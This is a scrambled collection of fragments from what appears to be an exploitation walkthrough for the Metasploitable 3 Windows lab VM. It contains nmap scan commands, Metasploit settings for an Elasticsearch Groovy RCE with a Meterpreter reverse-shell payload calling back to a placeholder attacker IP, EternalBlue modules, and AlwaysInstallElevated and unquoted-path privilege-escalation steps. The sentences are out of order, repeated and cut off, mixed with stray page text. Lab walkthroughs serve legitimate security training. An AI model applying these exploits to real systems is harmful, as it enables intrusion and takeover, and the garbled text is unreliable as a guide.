If your initial access yields a low-privilege user account (such as jenkins or iis_iusrs ), you must escalate privileges to NT AUTHORITY\SYSTEM . Local Information Gathering
Metasploitable 3 Windows runs an outdated version of Elasticsearch vulnerable to Remote Code Execution (RCE) via CVE-2015-1427. This vulnerability allows attackers to bypass sandbox restrictions using Groovy scripts. Exploitation via Metasploit: Initialize the Metasploit Framework: msfconsole Search for the module: search elasticsearch_groovy
You might find your actual host machine.
If you are an admin but not SYSTEM, use the incognito module in Meterpreter:
Whether you prefer focusing on or using Metasploit frameworks ? Share public link metasploitable 3 windows walkthrough
set RHOSTS TARGET_IP set RPORT 9200 set TARGET 1 # Windows Target set PAYLOAD windows/meterpreter/reverse_tcp set LHOST YOUR_IP set LPORT 4445 Use code with caution.
Run an aggressive Nmap scan to discover open ports, standard services, and operating system details. nmap -p- -sV -sC -O -T4 10.0.2.15 Use code with caution. Key Findings
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated Use code with caution. Exploitation: If both are active, generate a malicious MSI file:
With administrative or system-level access achieved, you can extract sensitive data to simulate a full compromise. If your initial access yields a low-privilege user
Metasploitable 3 includes services with unquoted paths containing spaces. Identify vulnerable services:
Document every finding, active service port, and successful exploit string.
Depending on the specific build version of the Metasploitable 3 image, it may be vulnerable to MS17-010 (EternalBlue) use auxiliary/scanner/smb/smb_ms17_010 use exploit/windows/smb/ms17_010_eternalblue
Launch an aggressive TCP port scan using Nmap to discover open ports, operating system details, and service versions. nmap -p- -sV -sC -O -T4 10.0.2.15 Use code with caution. Key Ports and Services Discovered The scan reveals an extensive attack surface: FTP (Microsoft ftpd) Port 22: SSH (OpenSSH 7.1) Run an aggressive Nmap scan to discover open
If the variable is empty, utilize Metasploit to automatically upload a User-Defined Function (UDF) DLL file to execute system commands:
Weak administrative practices on the machine permit successful dictionary attacks against standard protocols.
, a VM purposefully designed with known vulnerabilities for security testing. This guide focuses on the enumeration and exploitation of common services to achieve a Meterpreter shell. Exploitation of Metasploitable 3 (Windows Edition) 1. Information Gathering & Enumeration